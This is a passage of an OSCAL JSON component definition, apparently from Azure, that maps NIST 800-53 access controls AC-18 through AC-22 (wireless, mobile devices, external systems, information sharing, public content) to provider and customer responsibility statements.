remote access for customer-deployed resources. Rationale for such privileged command execution should be documented in the system security plan (SSP).","provided-uuid":"b6253eab-758b-4bd8-b1b7-0380bf5f7f51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8f6e8667-0131-4926-a7c7-bde87cb87685","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18","statements":[{"uuid":"5ae06ad8-c92e-4910-b626-beee97fd98ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-071"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-18_smt.a","by-components":[{"uuid":"ed2b32b2-675d-4447-b3a6-7a0ee0f4e498","export":{"provided":[{"uuid":"a9b42901-452d-440a-a59f-e303cd33622c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-071"}],"description":"Wireless access is not permitted within the Azure environment. Wireless networking exists within CorpNet so that Secure Admin Workstations (SAWs) can connect to CorpNet wirelessly, but once a user has authenticated to the Azure environment, all network connectivity within the Azure environment is over cabling, and assets do not have wireless technology embedded internally. 
CorpNet SAWs are outside the Azure authorization boundary."}],"responsibilities":[{"uuid":"f9a51b5d-a2d7-47ea-b5c1-0586280df2c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-071"}],"description":"The customer is responsible for wireless access within their environment.","provided-uuid":"a9b42901-452d-440a-a59f-e303cd33622c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5989447d-3d0d-493f-91d2-20c7ecb2dd86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-072"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-18_smt.b","by-components":[{"uuid":"09a7c051-0b1a-479b-b31e-f5ffcb22d7fb","export":{"provided":[{"uuid":"dee08eaa-6720-4816-bb59-9147efada751","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-072"}],"description":"Azure scans for rogue wireless signals within the Azure datacenters on a quarterly basis. Results are logged and documented by the Security Response Team, and any rogue signals are investigated and removed. Azure has also implemented a solution that continuously monitors for and alarms on detection of rogue wireless signals. This system has been deployed in phases to the Azure datacenters within the Azure authorization boundary. 
This system allows wireless scan data to be monitored continuously by the Azure Security Incident and Event Monitoring tool."}],"responsibilities":[{"uuid":"c2d1f2b1-d3df-45c9-af1a-7c53ee447cf9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-072"}],"description":"The customer is responsible for wireless access within their environment.","provided-uuid":"dee08eaa-6720-4816-bb59-9147efada751"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"58998350-0263-4320-8a86-0a824a1d4335","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.1","statements":[{"uuid":"b40f4180-9d80-4156-96bd-41c14bf775f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-073"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.1_smt","by-components":[{"uuid":"6bf95ad0-9d34-4167-80f9-5a951dc5ef41","export":{"provided":[{"uuid":"50ab7727-f5dd-4202-98cc-cadf263942db","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-073"}],"description":"Wireless access is not permitted within the Azure environment. Wireless networking exists within CorpNet so that Secure Admin Workstations (SAWs) can connect to CorpNet wirelessly, but once a user has authenticated to the Azure environment, all network connectivity within the Azure environment is over cabling, and assets do not have wireless technology embedded internally. 
CorpNet SAWs are outside the Azure authorization boundary."}],"responsibilities":[{"uuid":"0b214a73-0b57-4065-8a53-90e2e3c9eac2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-073"}],"description":"The customer is responsible for wireless access within their environment.","provided-uuid":"50ab7727-f5dd-4202-98cc-cadf263942db"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e926c520-a102-41ec-885e-0fe89901d8ca","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.3","statements":[{"uuid":"3c909fba-bf66-4173-86ef-4a7d4fb7c100","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-074"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.3_smt","by-components":[{"uuid":"36cfcfb0-4b68-47dd-973f-4c725d789e3a","export":{"provided":[{"uuid":"dfe478b2-2c06-413b-8b4c-94791f95427d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-074"}],"description":"Wireless access is not permitted within the Azure environment. Wireless networking exists within CorpNet so that Secure Admin Workstations (SAWs) can connect to CorpNet wirelessly, but once a user has authenticated to the Azure environment, all network connectivity within the Azure environment is over cabling, and assets do not have wireless technology embedded internally. 
CorpNet SAWs are outside the Azure authorization boundary."}],"responsibilities":[{"uuid":"11525474-7c38-4e5a-b941-5187b04d0b85","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-074"}],"description":"The customer is responsible for wireless access within their environment.","provided-uuid":"dfe478b2-2c06-413b-8b4c-94791f95427d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6f7d676a-9e9f-48d6-a636-e46742c04534","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.4","statements":[{"uuid":"d7e6a681-7d26-458f-af36-3fe8ff820ec1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-075"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.4_smt","by-components":[{"uuid":"be64ba77-410a-4e30-b821-4898fa05f93c","export":{"provided":[{"uuid":"c237943b-2aa5-4297-8d8d-f2df14452474","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-075"}],"description":"Wireless access is not permitted within the Azure environment. Wireless networking exists within CorpNet so that Secure Admin Workstations (SAWs) can connect to CorpNet wirelessly, but once a user has authenticated to the Azure environment, all network connectivity within the Azure environment is over cabling, and assets do not have wireless technology embedded internally. 
CorpNet SAWs are outside the Azure authorization boundary."}],"responsibilities":[{"uuid":"2a3523b7-89ea-44c3-8fc1-db5c01388d50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-075"}],"description":"The customer is responsible for wireless access within their environment.","provided-uuid":"c237943b-2aa5-4297-8d8d-f2df14452474"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0955034f-8ba5-4c02-8116-bad344c72af9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.5","statements":[{"uuid":"02e51e8e-97d8-4ac0-b043-fc11cddabd94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-076"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.5_smt","by-components":[{"uuid":"c27fab8d-c3d6-4ce6-9999-2dee6970557e","export":{"provided":[{"uuid":"baa6eee3-d614-436c-8f2c-34c00976ab03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-076"}],"description":"Wireless access is not permitted within the Azure environment. Wireless networking exists within CorpNet so that Secure Admin Workstations (SAWs) can connect to CorpNet wirelessly, but once a user has authenticated to the Azure environment, all network connectivity within the Azure environment is over cabling, and assets do not have wireless technology embedded internally. 
CorpNet SAWs are outside the Azure authorization boundary."}],"responsibilities":[{"uuid":"8e3fe774-8508-4050-98d8-390bd4cc18ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-076"}],"description":"The customer is responsible for wireless access within their environment.","provided-uuid":"baa6eee3-d614-436c-8f2c-34c00976ab03"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fdfee275-725e-41a5-95b4-f4e0bf53caa4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-19","statements":[{"uuid":"14aa60e3-7320-4f02-815a-38d4c967c714","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-077"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-19_smt.a","by-components":[{"uuid":"a6bb33a3-ac14-44ff-aba4-135056d25433","export":{"provided":[{"uuid":"81ce3424-3901-46df-8ae2-65261539673b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-077"}],"description":"Unauthorized mobile computing devices are not permitted in, or directly attached to, any Azure production environment."}],"responsibilities":[{"uuid":"c05996cd-aa5e-42a1-a6e7-0482b2f3b5c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-077"}],"description":"All customers are responsible for establishing usage restrictions, configuration and connection requirements, and implementation guidance for organization-controlled mobile devices used to connect to 
Azure.","provided-uuid":"81ce3424-3901-46df-8ae2-65261539673b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"87ecea98-1bde-4f1c-b42d-45cf3a9cdbb6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-078"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-19_smt.b","by-components":[{"uuid":"7a20bc0d-e896-47c3-a678-c615a1ce3424","export":{"provided":[{"uuid":"912f1054-cd3c-4f6d-ac90-94d04da30b3e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-078"}],"description":"Mobile computing and data recording devices are not to be used in any of Microsoft's production environments without prior approval by the Datacenter Management Team via an access request. Azure monitors for unauthorized use of mobile devices in the Azure environment and investigates accordingly. Azure uses a color-coded sticker system to identify authorized devices. 
Monitoring for unauthorized connections of mobile devices to servers is performed by security officers, who verify that every mobile device used on a server has a corresponding entry in the DCAT system, which records the authorization for an individual to bring a mobile device into the datacenter."}],"responsibilities":[{"uuid":"c94f9e7c-0345-4379-a3a4-3109466d2c6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-078"}],"description":"All customers are responsible for establishing usage restrictions, configuration and connection requirements, and implementation guidance for organization-controlled mobile devices used to connect to Azure.","provided-uuid":"912f1054-cd3c-4f6d-ac90-94d04da30b3e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0a031a84-87cb-4561-b1ff-a83351afe244","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-19.5","statements":[{"uuid":"931af93c-497c-472a-a2d6-ae4102c0339a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-079"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-19.5_smt","by-components":[{"uuid":"9cc86250-8097-4a9f-9a16-01adbfd845e7","export":{"provided":[{"uuid":"01f7c881-8dcf-46e8-b18f-f9b400d5f6f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-079"}],"description":"Vendor laptops are authorized by Datacenter Management to be connected to the Azure production environment for maintenance purposes only, to collect diagnostic information about the environment. 
Vendor laptops do not have logical access (i.e., credentials) to the production environment."}],"responsibilities":[{"uuid":"67c512a4-a1df-4436-a3c2-452e26ed2365","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-079"}],"description":"The customer is responsible for mobile devices within their environment.","provided-uuid":"01f7c881-8dcf-46e8-b18f-f9b400d5f6f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b48320b2-07b1-4b5b-acd0-69fc7dcb66c3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-20","statements":[{"uuid":"013ad2bd-989c-423f-a059-c84b403150a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-080"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-20_smt.a","by-components":[{"uuid":"e42ee1cd-1656-4c38-a395-45682e0bd7c0","export":{"provided":[{"uuid":"26a72d36-fe7a-4e79-80e5-d8ebe957d503","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-080"}],"description":"All groups supporting Azure use Secure Admin Workstations (SAWs). No administrative access to the information system is allowed other than through Microsoft systems and networks. 
Azure does not depend on external network access, internet or otherwise, for access to the cloud."}],"responsibilities":[{"uuid":"055a6d1a-cff8-44b9-bf47-0bf8cbf10512","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-080"}],"description":"The customer is responsible for establishing terms and conditions allowing authorized individuals to access the customer-deployed resources from external information systems.","provided-uuid":"26a72d36-fe7a-4e79-80e5-d8ebe957d503"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"65262d6f-8cf4-439a-b60d-c530b8b73477","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-081"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-20_smt.b","by-components":[{"uuid":"0c6549f3-b8e7-4fa3-a90d-0e025e6dd6b3","export":{"provided":[{"uuid":"db493fb5-ddeb-411b-b2b4-ce174cf9c24b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-081"}],"description":"No administrative access to the information system is allowed other than through Microsoft systems and networks. 
Azure does not depend on external network access, internet or otherwise, for access to the cloud."}],"responsibilities":[{"uuid":"504b3465-d733-40ce-ab8c-b41768a8bbbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-081"}],"description":"The customer is responsible for establishing terms and conditions allowing authorized individuals to process, store, or transmit customer-controlled information using external information systems.","provided-uuid":"db493fb5-ddeb-411b-b2b4-ce174cf9c24b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"02be77ed-866a-4207-9aae-a04a5a0ee1e2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-20.1","statements":[{"uuid":"4907b7ee-dcfb-4d5d-b24e-d982bc8715b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-082"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-20.1_smt.a","by-components":[{"uuid":"c3bbf073-fd3a-4f03-9a4a-1c49ceae3ce5","export":{"provided":[{"uuid":"321ad83f-508e-4202-b11e-05dbb4c90b87","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-082"}],"description":"No administrative access is allowed to the information system other than through Microsoft systems and networks."}],"responsibilities":[{"uuid":"8d36b559-c3fb-4dae-a93c-c05859121911","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-082"}],"description":"The customer is responsible for establishing terms and conditions for external systems accessing, 
processing, storing, or transmitting organization-defined information from customer-deployed resources.","provided-uuid":"321ad83f-508e-4202-b11e-05dbb4c90b87"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6a68a344-4488-40d2-9405-d1f745ba3dd8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-083"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-20.1_smt.b","by-components":[{"uuid":"16331ebc-1e9d-4014-aeaf-bd927df058fa","export":{"provided":[{"uuid":"0d3d9392-9360-4b66-8a30-737e50ac96fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-083"}],"description":"No administrative access is allowed to the information system other than through Microsoft systems and networks."}],"responsibilities":[{"uuid":"4cec333b-523b-4520-8ef9-1b65e57b4a4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-083"}],"description":"The customer is responsible for establishing terms and conditions for external systems accessing, processing, storing, or transmitting organization-defined information from customer-deployed resources.","provided-uuid":"0d3d9392-9360-4b66-8a30-737e50ac96fa"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"59fb289f-c810-428f-840b-51bac0e7623a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-20.2","statements":[{"uuid":"f8c3cf29-df47-4796-966b-a03d346e99a1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-084"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-20.2_smt","by-components":[{"uuid":"c8dc3d87-f1a5-4083-999d-d685f594d68d","export":{"provided":[{"uuid":"b8bd88ba-3e34-44e8-8dc0-97c9a7461d60","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-084"}],"description":"No administrative access is allowed to the information system other than through Microsoft systems and networks."}],"responsibilities":[{"uuid":"041f1b76-56e1-443f-9fd5-d1f3c545c2d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-084"}],"description":"The customer is responsible for establishing terms and conditions for external systems accessing, processing, storing, or transmitting organization-defined information from customer-deployed resources.","provided-uuid":"b8bd88ba-3e34-44e8-8dc0-97c9a7461d60"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e9a00704-0fe1-42e0-8fc8-9b4f49d18fd4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-21","statements":[{"uuid":"fb4569c0-7f00-4494-a108-509209a2ea3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-085"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-21_smt.a","by-components":[{"uuid":"a463cd05-8137-4df9-b9d1-9ebdd900daf0","export":{"provided":[{"uuid":"22a3955a-09c8-48e8-9560-6e9a6b054fd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-085"}],"description":"Per Microsoft corporate and Azure security policies, Azure personnel are not authorized to share Azure data or customer content outside the security boundary and thus do not make discretionary sharing decisions. Unless approved by the customer, Azure personnel do not have access to unencrypted customer data or resources. 
<https://www.microsoft.com/en-us/trust-center/privacy/customer-data-definitions>"}],"responsibilities":[{"uuid":"d5da749a-3b08-48a7-b1f1-41295dd5f95e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-085"}],"description":"The customer is responsible for determining when authorized users are required to use discretion as to whether to share customer-controlled information.","provided-uuid":"22a3955a-09c8-48e8-9560-6e9a6b054fd5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"973b1311-5f18-48e3-857a-4f74c138c073","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-086"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-21_smt.b","by-components":[{"uuid":"cd84f18d-4172-4097-ac79-4796c5dc1f54","export":{"provided":[{"uuid":"eb228a11-fbd5-4788-9c71-13575a8aaba8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-086"}],"description":"Per Microsoft corporate and Azure security policies, Azure personnel are not authorized to share Azure data or customer content outside the security boundary and thus do not make discretionary sharing decisions. Unless approved by the customer, Azure personnel do not have access to unencrypted customer data or resources. 
<https://www.microsoft.com/en-us/trust-center/privacy/customer-data-definitions>"}],"responsibilities":[{"uuid":"96bf47b6-374c-444f-bfb9-28dd8080c2ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-086"}],"description":"The customer is responsible for employing a process to assist users with making information sharing decisions.","provided-uuid":"eb228a11-fbd5-4788-9c71-13575a8aaba8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6351de40-6810-4f77-abe8-01eafaee1c23","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-22","statements":[{"uuid":"b20b5a89-442c-433e-b429-79fea306dde4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-087"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.a","by-components":[{"uuid":"9d45de7d-5dca-42c8-86ab-0b9ae161e685","export":{"provided":[{"uuid":"016e40b1-9c6c-48a5-b98d-fedb9c400112","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-087"}],"description":"Azure does not have any publicly accessible information systems. The only information accessible by customers are the Feature Descriptions, Developer Documents, Legal, Privacy Statement, Help, and Language Preference options on the customer facing welcome page. Azure has designated the Microsoft Content Management Team as the group authorized to make changes to this limited information. 
In addition to the Content Management Team, there are select, authorized individuals from within Azure who are permitted to post blog entries about Azure."}],"responsibilities":[{"uuid":"b0c75e8b-9eec-42e2-acc5-638ad9e1648d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-087"}],"description":"The customer is responsible for designating authorized personnel to post publicly accessible information on customer-deployed resources.","provided-uuid":"016e40b1-9c6c-48a5-b98d-fedb9c400112"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"be4af740-95a2-4ddf-8780-112e9cf5d6be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-088"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.b","by-components":[{"uuid":"f72e54fd-6dce-41e6-8917-2d1f7f2fc80d","export":{"provided":[{"uuid":"deb12178-3c07-4ae5-8778-139ddc6e317d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-088"}],"description":"All Azure personnel, including those who maintain or produce publicly available content, are required to take Standards of Business Conduct training. The training provides information intended to raise awareness in the areas of anti-trust, corruption, unauthorized entry/theft, business policy, public disclosure, and applicable laws and regulations. 
This training is required during orientation and annually thereafter."}],"responsibilities":[{"uuid":"24def8c9-810a-4684-af69-48b19c1a384d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-088"}],"description":"The customer is responsible for training the personnel designated in AC-22.a to prevent disclosure of nonpublic customer-controlled information.","provided-uuid":"deb12178-3c07-4ae5-8778-139ddc6e317d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2f563987-9b07-498b-9c91-4afd2e98f8d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-089"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.c","by-components":[{"uuid":"956fa8f5-a0c1-4011-89f5-8809e01a5ebb","export":{"provided":[{"uuid":"8bdda9f6-c89c-4d9a-be79-bac73d151591","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-089"}],"description":"All information must go through the Microsoft Content Management Team for review prior to being posted to ensure that nonpublic information is not made available. 
